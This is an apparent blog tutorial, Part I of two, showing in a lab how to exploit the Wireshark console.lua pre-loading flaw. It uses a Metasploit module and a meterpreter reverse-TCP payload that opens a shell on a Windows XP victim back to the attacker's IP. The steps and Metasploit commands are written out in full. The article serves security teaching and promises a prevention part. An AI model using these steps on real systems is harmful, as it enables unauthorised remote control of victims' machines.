I am writing this article into 2 parts. In Wireshark console.lua pre-loading vulnerability Exploitation and Prevention Part-I, i will explain you how to exploit Wireshark console.lua pre-loading vulnerability in windows with Metasploit Express, In 2nd part i will show you how to prevent Wireshark console.lua pre-loading vulnerability with Symantec Critical System Protection (SCSP)
Wireshark console.lua pre-loading vulnerability
This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a pcap file, Wireshark will actually check if there's a 'console.lua' file in the same directory, and then parse/execute the script if found. Versions affected by this vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8
Exploitation Of Wireshark console.lua pre-loading vulnerability
1) Our Victim is using windows xp professional SP3 and its IP Address is 192.168.42.179
2) I am using Backtrack 5 R1 as Attacker machine and its IP Address is 192.168.42.75
3) I am using windows/misc/wireshark_lua metasploit module for Wireshark console.lua pre-loading vulnerability (use exploit/windows/misc/wireshark_lua).
4) To view available option run show options command, I have to set the srvhost (set srvhost 192.168.42.75)
5) I am using windows/meterpreter/reverse_tcp payload (set payload windows/meterpreter/reverse_tcp).
6) Now i have to enter LHOST (Local Host) i.e 192.168.42.75 (Attacker Machine IP Address).
7) Write exploit and Hit Enter. Server is started on Attacker Machine to listen connection from other machine's and to infect them.
8) When our victim tries to access the shared folder of Attacker machine.
9) It shows a malicous pcap file om Victim Machine.
10) When our victim tries to open the msf.pcap file in wireshark. Our exploit will execute on his machine and give shell to the attacker machine.
11) I successfully got the meterpreter shell of Our victim machine.
12) Let's type ipconfig command to verify Whether we enter into victim machine or not.
In next part, I will show you how to prevent the exploitation of Wireshark console.lua pre-loading vulnerability in windows with Symantec Critical System Protection (SCSP).